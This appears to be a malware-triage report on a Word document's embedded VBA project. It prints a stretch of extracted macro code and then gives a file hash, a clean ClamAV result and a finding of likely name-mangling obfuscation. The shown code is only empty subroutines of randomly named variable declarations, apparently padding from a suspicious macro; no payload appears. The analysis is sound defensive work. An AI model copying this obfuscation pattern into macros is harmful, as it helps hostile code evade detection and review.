Dim ked34p3trrw As String
Dim eh3jefbp4qf As String
Dim knsq5hyppb4 As String
Dim xccyrc4z4h4 As String
Dim vx55jdtesou As String
Dim ws4nzgtjsv2 As String
Dim wivaw0sqq3s As String
End Sub

Public Sub vpqgxina2nw()

Dim AA2gfpezocyvo As String
Dim AA1pb3qrwpbof As String
Dim vsbx5mzu1mj As String
Dim j14okoyc01p As String
Dim AA2b5eqb5jlgc As String
Dim zg0vnhzvfge As String
Dim AA11l5jf1ftun As String
Dim shmr5zg2wbs As String
Dim AA3ylpxlwy50f As String
Dim AA3azrt4n5lwd As String
Dim r5cbzor0tje As String
Dim mm1qtkgu3ge As String
Dim AA3aay44tfd5k As String
Dim AA13de2xslw3c As String
Dim osjycgsumqj As String
Dim htnw4bmjye5 As String
Dim whac2nydqpa As String
Dim zuabf13kirq As String
Dim mllje0nnzue As String
Dim ux30fzn23wo As String
End Sub

Public Sub icegu03lkhx()

Dim d2k01baeceu As String
Dim AA3xt1wak1b3j As String
Dim ryoxs2vq1lu As String
Dim k3snzjtlr5b As String
Dim ariopdls1m3 As String
Dim zbmjmc5bvbf As String
Dim q3retzbnezu As String
Dim lusesmb5xg2 As String
Dim AA1ctwxr0ybm4 As String
Dim zq5egaud4m2 As String
Dim qn5jv2f0w2d As String
Dim hrujmbspshx As String
Dim raqu3ebyfmi As String
Dim fkwljgtcseu As String
Dim ojfwye0vpny As String
Dim j0l5qrdi5c4 As String
Dim gxrfmhhwsaz As String
Dim f2bgs5mjvjp As String
Dim yv5bacazrqh As String
Dim ijk3uatk4ku As String
End Sub

Public Sub AA1i2ztzbqvnw()

Dim d12gmc2inmj As String
Dim AA2dlv24ll4t5 As String
Dim xzljdqjz1zs As String
Dim bxxy4205ehh As String
Dim s4i0czgih2h As String
Dim iy0eabwd2op As String
Dim xd50f1plceu As String
Dim srawctcgoyl As String
Dim syihr1jr3ka As String
Dim AA2vazznjwicp As String
Dim qwv3oxqnhun As String
Dim kxmxqqmmjei As String
Dim AA5nu3szvfs1c As String
Dim mowf3rs0342 As String
Dim pijvqruatqn As String
Dim vht0cwh5zeq As String
Dim AA231umv1gtag As String
Dim b5ih1240p0a As String
Dim AA5z10iwr5pha As String
Dim AA0gdsfkxxhtc As String
End Sub
…
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 102400 bytes
SHA-256: 0d358cd1bcf233747a3fdb83038710ad44d82579405682a104007e3b09f9386e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
1019 of 2022 identifiers look randomly generated (e.g. 'a6wqfhp552gynsfhwndl88m8h6l8yjbipmgdsp0w') — consistent with name-mangling obfuscation.